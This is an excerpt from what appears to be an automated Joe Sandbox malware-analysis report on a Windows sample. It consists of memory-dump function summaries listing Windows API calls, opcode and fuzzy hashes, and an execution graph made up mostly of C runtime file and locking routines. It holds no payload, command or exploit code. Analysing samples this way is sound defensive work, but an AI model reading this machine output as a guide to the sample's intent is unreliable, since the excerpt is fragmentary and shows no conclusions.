                                                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C3ACE1
                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C3AD05
                                                                                                                                      • GetModuleFileNameA.KERNEL32(02C30000,?,00000105), ref: 02C3AD20
                                                                                                                                      • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C3ADB6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3990497365-0
                                                                                                                                      • Opcode ID: d78f758516fbd19d17f8f49bfe8369bb35f620fbbeae9d43cb435327322ddb27
                                                                                                                                      • Instruction ID: 10ca8a6e76e1b62eae4df42b733eda2713567c07f34fd1b69f78c42a73ead1f2
                                                                                                                                      • Opcode Fuzzy Hash: d78f758516fbd19d17f8f49bfe8369bb35f620fbbeae9d43cb435327322ddb27
                                                                                                                                      • Instruction Fuzzy Hash: 3A416F71A40258AFDB22DB68CC84BDEB7FDAB18301F0048E5A648E7241DB759F98DF50
                                                                                                                                      Function 02C3ACC2 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C3ACE1
                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C3AD05
                                                                                                                                      • GetModuleFileNameA.KERNEL32(02C30000,?,00000105), ref: 02C3AD20
                                                                                                                                      • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C3ADB6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3990497365-0
                                                                                                                                      • Opcode ID: 987317bddc7cf7c690bda678ad7df33dca04c3acc1fe0371c5b275feb5f82f62
                                                                                                                                      • Instruction ID: 04cb20c451815ba27a90deb096f42b84afc9e51815b8e77c113a34513148b973
                                                                                                                                      • Opcode Fuzzy Hash: 987317bddc7cf7c690bda678ad7df33dca04c3acc1fe0371c5b275feb5f82f62
                                                                                                                                      • Instruction Fuzzy Hash: 92416F71A40258AFDB22DB68CC84BDAB7FDAB18301F0048E5A648E7341DB759F98DF54
                                                                                                                                      Function 02C31C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3dee088dcf62b5dd45a3468e945a78e853955b850268245b002326c9d09cc73f
                                                                                                                                      • Instruction ID: 9bcf1bf75baa17c1a7ec4a076eca1f1d55d491a04e79fd549319f9b7072699ad
                                                                                                                                      • Opcode Fuzzy Hash: 3dee088dcf62b5dd45a3468e945a78e853955b850268245b002326c9d09cc73f
                                                                                                                                      • Instruction Fuzzy Hash: 77A1E5767106000FE71AAA7D9C843BDB3C29BC5325F1C8A7EE11DCB381EBE5CA529650
                                                                                                                                      Function 02C39474 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02C39562), ref: 02C394FA
                                                                                                                                      • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02C39562), ref: 02C39500
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DateFormatLocaleThread
                                                                                                                                      • String ID: yyyy
                                                                                                                                      • API String ID: 3303714858-3145165042
                                                                                                                                      • Opcode ID: e8cbe5347237f9231f1453603d22ee538a6ff92d5f52480513472a2ad1969d14
                                                                                                                                      • Instruction ID: 42bf79a3030425f2388e956dcce8472af4b7c7849ff9dcd2d3b24920c40a3695
                                                                                                                                      • Opcode Fuzzy Hash: e8cbe5347237f9231f1453603d22ee538a6ff92d5f52480513472a2ad1969d14
                                                                                                                                      • Instruction Fuzzy Hash: B4219172A002189FDB26DF98C841AEEB3B9EF48710F5148A5F905E7240D770DF40DBA5
                                                                                                                                      Function 02C4818C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C48090,?,?,00000000,?,02C47A06,ntdll,00000000,00000000,02C47A4B,?,?,00000000), ref: 02C4805E
                                                                                                                                        • Part of subcall function 02C48020: GetModuleHandleA.KERNELBASE(?), ref: 02C48072
                                                                                                                                        • Part of subcall function 02C480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C48150,?,?,00000000,00000000,?,02C48069,00000000,KernelBASE,00000000,00000000,02C48090), ref: 02C48115
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C4811B
                                                                                                                                        • Part of subcall function 02C480C8: GetProcAddress.KERNEL32(?,?), ref: 02C4812D
                                                                                                                                      • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02C48216), ref: 02C481F8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                      • String ID: FlushInstructionCache$Kernel32
                                                                                                                                      • API String ID: 3811539418-184458249
                                                                                                                                      • Opcode ID: de7bcf165989e69898ea97bb35779b866e2eb7b7921b34bf3f247a1841a8efb2
                                                                                                                                      • Instruction ID: 12752efd59256f4f74b27ab06736506f234e74a9d99720cceabbb88915c312ba
                                                                                                                                      • Opcode Fuzzy Hash: de7bcf165989e69898ea97bb35779b866e2eb7b7921b34bf3f247a1841a8efb2
                                                                                                                                      • Instruction Fuzzy Hash: 39018175650304BFEB25EFA4DC42F5F77ADEB48B10F614A60F908D3640DA74AD10AB24
                                                                                                                                      Function 02C36444 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocValue
                                                                                                                                      • String ID: Z
                                                                                                                                      • API String ID: 1189806713-3659616827
                                                                                                                                      • Opcode ID: c7afc902e072ce32c628bf018933150947fad0e85db6de1f90f7632155adcf30
                                                                                                                                      • Instruction ID: b50aed14cb4bcc2e0e16fa0301c5841a4d85ff1b6f364582e47b8402344f6603
                                                                                                                                      • Opcode Fuzzy Hash: c7afc902e072ce32c628bf018933150947fad0e85db6de1f90f7632155adcf30
                                                                                                                                      • Instruction Fuzzy Hash: D4C08CB0E80320AAEB02FBB0D00470932ADEB01344F208E20B404C710CDB35C090EF1C
                                                                                                                                      Function 02C4AD64 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C4AD98
                                                                                                                                      • IsBadWritePtr.KERNEL32(?,00000004), ref: 02C4ADC8
                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000008), ref: 02C4ADE7
                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C4ADF3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.2475914324.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                                      • Associated: 00000006.00000002.2475881149.0000000002C30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476032008.0000000002C8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002C91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000006.00000002.2476359468.0000000002D88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_2c30000_x.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Read$Write
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3448952669-0
                                                                                                                                      • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                                                                                      • Instruction ID: 9a75b562804b8b195a977d92a0dee1ee275df803f1740a763ebf72c929afcb46
                                                                                                                                      • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                                                                                      • Instruction Fuzzy Hash: 3021B4B1A80619ABDB10CF69CC80BAFB7B9EF84352F104511EE1097344EF34D911EAA4

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:4.1%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:3%
                                                                                                                                      Total number of Nodes:1930
                                                                                                                                      Total number of Limit Nodes:69
                                                                                                                                      execution_graph 14816 40fb09 14823 40c3d8 14816->14823 14819 40fb1c 14821 40b6b5 __output_l 63 API calls 14819->14821 14822 40fb27 14821->14822 14824 40c2ab _flsall 101 API calls 14823->14824 14825 40c3df 14824->14825 14825->14819 14826 4157fa 14825->14826 14827 415806 __fcloseall 14826->14827 14828 40d6e0 __lock 63 API calls 14827->14828 14831 415812 14828->14831 14829 41587b 14836 415890 14829->14836 14831->14829 14833 40c081 __fcloseall 102 API calls 14831->14833 14834 415850 DeleteCriticalSection 14831->14834 14832 415887 __fcloseall 14832->14819 14833->14831 14835 40b6b5 __output_l 63 API calls 14834->14835 14835->14831 14839 40d606 LeaveCriticalSection 14836->14839 14838 415897 14838->14832 14839->14838 14840 40b70b 14843 40d606 LeaveCriticalSection 14840->14843 14842 40b712 14843->14842 14593 41074f 14595 41075b __fcloseall 14593->14595 14594 410773 14598 410781 14594->14598 14600 40b6b5 __output_l 63 API calls 14594->14600 14595->14594 14596 41085d __fcloseall 14595->14596 14597 40b6b5 __output_l 63 API calls 14595->14597 14597->14594 14599 41078f 14598->14599 14601 40b6b5 __output_l 63 API calls 14598->14601 14602 41079d 14599->14602 14603 40b6b5 __output_l 63 API calls 14599->14603 14600->14598 14601->14599 14604 4107ab 14602->14604 14605 40b6b5 __output_l 63 API calls 14602->14605 14603->14602 14606 40b6b5 __output_l 63 API calls 14604->14606 14609 4107b9 14604->14609 14605->14604 14606->14609 14607 40b6b5 __output_l 63 API calls 14610 4107c7 14607->14610 14608 4107d8 14612 40d6e0 __lock 63 API calls 14608->14612 14609->14607 14609->14610 14610->14608 14611 40b6b5 __output_l 63 API calls 14610->14611 14611->14608 14613 4107e0 14612->14613 14614 410805 14613->14614 14615 4107ec InterlockedDecrement 14613->14615 14629 410869 14614->14629 14615->14614 14617 4107f7 14615->14617 14617->14614 14620 40b6b5 __output_l 63 API calls 14617->14620 14619 40d6e0 __lock 63 API calls 14621 410819 14619->14621 14620->14614 14622 41084a 14621->14622 14623 414661 ___removelocaleref 8 API calls 14621->14623 14632 410875 14622->14632 14627 41082e 14623->14627 14626 40b6b5 __output_l 63 API calls 14626->14596 14627->14622 14628 414489 ___freetlocinfo 63 API calls 14627->14628 14628->14622 14635 40d606 LeaveCriticalSection 14629->14635 14631 410812 14631->14619 14636 40d606 LeaveCriticalSection 14632->14636 14634 410857 14634->14626 14635->14631 14636->14634 14976 4059d0 14979 4057b0 14976->14979 14978 4059e0 14980 4057d3 14979->14980 14981 4059c6 14979->14981 14980->14981 14982 40b84d _malloc 63 API calls 14980->14982 14981->14978 14984 4057e3 14982->14984 14983 405921 14983->14978 14984->14983 14985 40b84d _malloc 63 API calls 14984->14985 14988 405847 14985->14988 14986 40591c 14987 405160 102 API calls 14986->14987 14987->14983 14988->14986 14989 4058e6 14988->14989 14990 40592b 14988->14990 14992 40b84d _malloc 63 API calls 14989->14992 14991 40b84d _malloc 63 API calls 14990->14991 14993 40590b 14991->14993 14992->14993 14993->14986 14994 40bfc1 __output_l 63 API calls 14993->14994 14995 405961 14994->14995 14996 405970 14995->14996 14997 40597c 14995->14997 15007 40cb9d 14996->15007 15010 40c953 14997->15010 15000 40597a 15000->14986 15001 40598c 15000->15001 15002 405992 15001->15002 15003 405000 77 API calls 15001->15003 15002->14978 15004 4059aa 15003->15004 15030 40c8e5 15004->15030 15006 4059b3 15006->14978 15043 40cad9 15007->15043 15009 40cbaf 15009->15000 15011 40c95f __fcloseall 15010->15011 15012 40c96f 15011->15012 15013 40c9a3 15011->15013 15014 40c996 15011->15014 15015 40bfc1 __output_l 63 API calls 15012->15015 15017 40c9af 15013->15017 15024 40c9da 15013->15024 15016 40bfc1 __output_l 63 API calls 15014->15016 15018 40c974 15015->15018 15021 40c984 __fcloseall 15016->15021 15019 40bfc1 __output_l 63 API calls 15017->15019 15020 40e744 __output_l 6 API calls 15018->15020 15019->15018 15020->15021 15021->15000 15022 40ca8a 15023 411e5b __getstream 66 API calls 15022->15023 15025 40ca8f 15023->15025 15024->15012 15024->15022 15026 40caa8 15025->15026 15027 40ca98 15025->15027 15299 40cad1 15026->15299 15029 40bfc1 __output_l 63 API calls 15027->15029 15029->15021 15031 40c8f1 __fcloseall 15030->15031 15032 40c91c 15031->15032 15033 40c8ff 15031->15033 15034 40fb29 __lock_file 64 API calls 15032->15034 15035 40bfc1 __output_l 63 API calls 15033->15035 15036 40c924 15034->15036 15037 40c904 15035->15037 15038 40c748 __fseek_nolock 67 API calls 15036->15038 15039 40e744 __output_l 6 API calls 15037->15039 15040 40c930 15038->15040 15042 40c914 __fcloseall 15039->15042 15302 40c949 15040->15302 15042->15006 15045 40cae5 __fcloseall 15043->15045 15044 40caf8 15046 40bfc1 __output_l 63 API calls 15044->15046 15045->15044 15048 40cb2d 15045->15048 15047 40cafd 15046->15047 15049 40e744 __output_l 6 API calls 15047->15049 15062 411e5b 15048->15062 15051 40cb0d __fcloseall @_EH4_CallFilterFunc@8 15049->15051 15051->15009 15052 40cb32 15053 40cb46 15052->15053 15054 40cb39 15052->15054 15056 40cb6d 15053->15056 15057 40cb4d 15053->15057 15055 40bfc1 __output_l 63 API calls 15054->15055 15055->15051 15080 411f93 15056->15080 15059 40bfc1 __output_l 63 API calls 15057->15059 15059->15051 15063 411e67 __fcloseall 15062->15063 15064 40d6e0 __lock 63 API calls 15063->15064 15075 411e75 15064->15075 15065 411eea 15105 411f8a 15065->15105 15066 411ef1 15068 411c75 __malloc_crt 63 API calls 15066->15068 15070 411efb 15068->15070 15069 411f7f __fcloseall 15069->15052 15070->15065 15071 41389c __ioinit InitializeCriticalSectionAndSpinCount 15070->15071 15074 411f20 15071->15074 15072 40d61d __mtinitlocknum 63 API calls 15072->15075 15073 40fb6a __getstream 64 API calls 15073->15075 15076 411f2b 15074->15076 15077 411f3e EnterCriticalSection 15074->15077 15075->15065 15075->15066 15075->15072 15075->15073 15078 40fbd8 __getstream 2 API calls 15075->15078 15079 40b6b5 __output_l 63 API calls 15076->15079 15077->15065 15078->15075 15079->15065 15081 411fb5 15080->15081 15082 411fc9 15081->15082 15094 411fe8 15081->15094 15083 40bfc1 __output_l 63 API calls 15082->15083 15084 411fce 15083->15084 15086 40e744 __output_l 6 API calls 15084->15086 15085 4121a5 15087 412215 15085->15087 15088 4121fb 15085->15088 15091 40cb78 15086->15091 15115 4162c0 15087->15115 15090 40bfc1 __output_l 63 API calls 15088->15090 15092 412200 15090->15092 15102 40cb93 15091->15102 15093 40e744 __output_l 6 API calls 15092->15093 15093->15091 15094->15085 15094->15088 15109 41668f 15094->15109 15099 41650b __fassign 98 API calls 15100 4121be 15099->15100 15100->15085 15101 41650b __fassign 98 API calls 15100->15101 15101->15085 15103 40fb9c _fputc 2 API calls 15102->15103 15104 40cb9b 15103->15104 15104->15051 15108 40d606 LeaveCriticalSection 15105->15108 15107 411f91 15107->15069 15108->15107 15118 416525 15109->15118 15111 412170 15111->15088 15112 41650b 15111->15112 15131 4162e0 15112->15131 15155 4161f4 15115->15155 15117 4162db 15117->15091 15119 41653c 15118->15119 15122 416535 _strncmp 15118->15122 15120 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15119->15120 15121 416548 15120->15121 15121->15122 15123 4165a6 15121->15123 15124 41657b 15121->15124 15122->15111 15123->15122 15127 40bfc1 __output_l 63 API calls 15123->15127 15125 40bfc1 __output_l 63 API calls 15124->15125 15126 416580 15125->15126 15128 40e744 __output_l 6 API calls 15126->15128 15129 4165b3 15127->15129 15128->15122 15130 40e744 __output_l 6 API calls 15129->15130 15130->15122 15132 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15131->15132 15133 4162f4 15132->15133 15134 416316 15133->15134 15135 41633c 15133->15135 15144 41219e 15133->15144 15146 417d0f 15134->15146 15136 416341 15135->15136 15137 41636f 15135->15137 15139 40bfc1 __output_l 63 API calls 15136->15139 15141 40bfc1 __output_l 63 API calls 15137->15141 15137->15144 15140 416346 15139->15140 15142 40e744 __output_l 6 API calls 15140->15142 15143 41637c 15141->15143 15142->15144 15145 40e744 __output_l 6 API calls 15143->15145 15144->15085 15144->15099 15145->15144 15149 417d1f 15146->15149 15152 417d51 15146->15152 15147 417c1d __strnicmp_l 98 API calls 15150 417d39 15147->15150 15148 417d24 15151 40bfc1 __output_l 63 API calls 15148->15151 15149->15148 15149->15152 15150->15144 15153 417d29 15151->15153 15152->15147 15154 40e744 __output_l 6 API calls 15153->15154 15154->15150 15158 416200 __fcloseall 15155->15158 15156 416213 15157 40bfc1 __output_l 63 API calls 15156->15157 15160 416218 15157->15160 15158->15156 15159 416251 15158->15159 15166 415ad5 15159->15166 15162 40e744 __output_l 6 API calls 15160->15162 15165 416227 __fcloseall 15162->15165 15165->15117 15167 415afa 15166->15167 15226 418153 15167->15226 15170 40e61c __invoke_watson 10 API calls 15175 415b25 15170->15175 15171 415b5e 15172 40bfd4 __lseeki64 63 API calls 15171->15172 15173 415b63 15172->15173 15174 40bfc1 __output_l 63 API calls 15173->15174 15176 415b6d 15174->15176 15175->15171 15178 415c1e 15175->15178 15177 40e744 __output_l 6 API calls 15176->15177 15206 415b7c 15177->15206 15232 415660 15178->15232 15180 415cc0 15181 415ce1 CreateFileA 15180->15181 15182 415cc7 15180->15182 15184 415d7b GetFileType 15181->15184 15185 415d0e 15181->15185 15183 40bfd4 __lseeki64 63 API calls 15182->15183 15188 415ccc 15183->15188 15186 415d88 GetLastError 15184->15186 15187 415dcc 15184->15187 15189 415d47 GetLastError 15185->15189 15192 415d22 CreateFileA 15185->15192 15190 40bfe7 __dosmaperr 63 API calls 15186->15190 15250 41541b 15187->15250 15191 40bfc1 __output_l 63 API calls 15188->15191 15193 40bfe7 __dosmaperr 63 API calls 15189->15193 15194 415db1 CloseHandle 15190->15194 15195 415cd6 15191->15195 15192->15184 15192->15189 15193->15195 15194->15195 15196 415dbf 15194->15196 15198 40bfc1 __output_l 63 API calls 15195->15198 15199 40bfc1 __output_l 63 API calls 15196->15199 15198->15206 15199->15195 15200 41600a 15203 416177 CloseHandle CreateFileA 15200->15203 15200->15206 15202 4118c4 __lseek_nolock 65 API calls 15204 415e51 15202->15204 15205 4161a2 GetLastError 15203->15205 15203->15206 15208 40bfd4 __lseeki64 63 API calls 15204->15208 15218 415e60 15204->15218 15207 40bfe7 __dosmaperr 63 API calls 15205->15207 15222 416292 15206->15222 15210 4161ae 15207->15210 15208->15218 15209 40fd32 73 API calls __read_nolock 15209->15218 15211 41549c __free_osfhnd 64 API calls 15210->15211 15211->15206 15212 4118c4 65 API calls __lseek_nolock 15212->15218 15213 410a0b __close_nolock 66 API calls 15213->15218 15215 40f944 __locking 97 API calls 15215->15218 15216 414f8f 65 API calls __lseeki64_nolock 15216->15218 15217 416072 15219 410a0b __close_nolock 66 API calls 15217->15219 15218->15200 15218->15209 15218->15212 15218->15213 15218->15215 15218->15216 15218->15217 15259 417ee1 15218->15259 15220 416079 15219->15220 15221 40bfc1 __output_l 63 API calls 15220->15221 15221->15206 15223 416297 15222->15223 15224 4162be 15222->15224 15298 415639 LeaveCriticalSection 15223->15298 15224->15165 15227 418162 15226->15227 15228 415b16 15226->15228 15229 40bfc1 __output_l 63 API calls 15227->15229 15228->15170 15228->15175 15230 418167 15229->15230 15231 40e744 __output_l 6 API calls 15230->15231 15231->15228 15233 41566c __fcloseall 15232->15233 15234 40d61d __mtinitlocknum 63 API calls 15233->15234 15235 41567c 15234->15235 15236 40d6e0 __lock 63 API calls 15235->15236 15237 415681 __fcloseall 15235->15237 15246 415690 15236->15246 15237->15180 15238 4157d3 15293 4157f1 15238->15293 15239 415769 15241 411cba __calloc_crt 63 API calls 15239->15241 15244 415772 15241->15244 15242 40d6e0 __lock 63 API calls 15242->15246 15243 415711 EnterCriticalSection 15245 415721 LeaveCriticalSection 15243->15245 15243->15246 15244->15238 15247 415599 ___lock_fhandle 64 API calls 15244->15247 15245->15246 15246->15238 15246->15239 15246->15242 15246->15243 15248 41389c __ioinit InitializeCriticalSectionAndSpinCount 15246->15248 15290 415733 15246->15290 15247->15238 15248->15246 15251 415482 15250->15251 15252 415429 15250->15252 15253 40bfc1 __output_l 63 API calls 15251->15253 15252->15251 15258 41544d 15252->15258 15254 415487 15253->15254 15255 40bfd4 __lseeki64 63 API calls 15254->15255 15256 415478 15255->15256 15256->15200 15256->15202 15256->15218 15257 415472 SetStdHandle 15257->15256 15258->15256 15258->15257 15260 414f8f __lseeki64_nolock 65 API calls 15259->15260 15261 417f00 15260->15261 15262 414f8f __lseeki64_nolock 65 API calls 15261->15262 15270 417f63 15261->15270 15265 417f1c 15262->15265 15263 40bfc1 __output_l 63 API calls 15273 417f6e 15263->15273 15264 417f42 GetProcessHeap HeapAlloc 15266 417f5e 15264->15266 15279 417f75 __setmode_nolock 15264->15279 15265->15264 15268 417ffe 15265->15268 15265->15270 15269 40bfc1 __output_l 63 API calls 15266->15269 15267 414f8f __lseeki64_nolock 65 API calls 15267->15270 15271 414f8f __lseeki64_nolock 65 API calls 15268->15271 15286 418067 15268->15286 15269->15270 15270->15263 15270->15273 15272 418017 15271->15272 15272->15270 15274 415522 __lseek_nolock 63 API calls 15272->15274 15273->15218 15275 41802d SetEndOfFile 15274->15275 15276 41804a 15275->15276 15275->15286 15278 40bfc1 __output_l 63 API calls 15276->15278 15277 40f211 __write_nolock 95 API calls 15277->15279 15280 41804f 15278->15280 15279->15277 15281 417fe1 15279->15281 15289 417fb8 __setmode_nolock 15279->15289 15283 40bfd4 __lseeki64 63 API calls 15280->15283 15282 40bfd4 __lseeki64 63 API calls 15281->15282 15284 417fe6 15282->15284 15285 41805a GetLastError 15283->15285 15288 40bfc1 __output_l 63 API calls 15284->15288 15284->15289 15285->15286 15286->15267 15286->15270 15287 417fc6 GetProcessHeap HeapFree 15287->15286 15288->15289 15289->15287 15296 40d606 LeaveCriticalSection 15290->15296 15292 41573a 15292->15246 15297 40d606 LeaveCriticalSection 15293->15297 15295 4157f8 15295->15237 15296->15292 15297->15295 15298->15224 15300 40fb9c _fputc 2 API calls 15299->15300 15301 40cad7 15300->15301 15301->15021 15303 40fb9c _fputc 2 API 